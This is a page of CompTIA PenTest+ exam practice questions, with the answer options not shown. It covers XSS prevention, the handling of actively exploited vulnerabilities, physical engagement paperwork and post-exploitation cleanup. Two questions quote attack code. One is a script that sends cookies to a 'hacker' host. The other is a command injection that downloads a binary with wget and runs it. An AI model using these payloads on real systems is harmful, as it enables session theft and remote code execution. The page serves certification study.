CompTIA PT1-002 Exam Practice Questions (P. 5)

DRAG DROP -
You are a penetration tester reviewing a client's website through a web browser.

INSTRUCTIONS -
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.






Select and Place:

Given the following code:
<SCRIPT>var+img=new+Image();img.src=`http://hacker/%20+%20document.cookie;</SCRIPT>
Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals. Which of the following should the tester do NEXT?

A penetration-testing team is conducting a physical penetration test to gain entry to a building. Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them?

A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: exploit = `POST ` exploit += `/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} `" c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%
27&loginUser=a&Pwd=a`
exploit += `HTTP/1.1`
Which of the following commands should the penetration tester run post-engagement?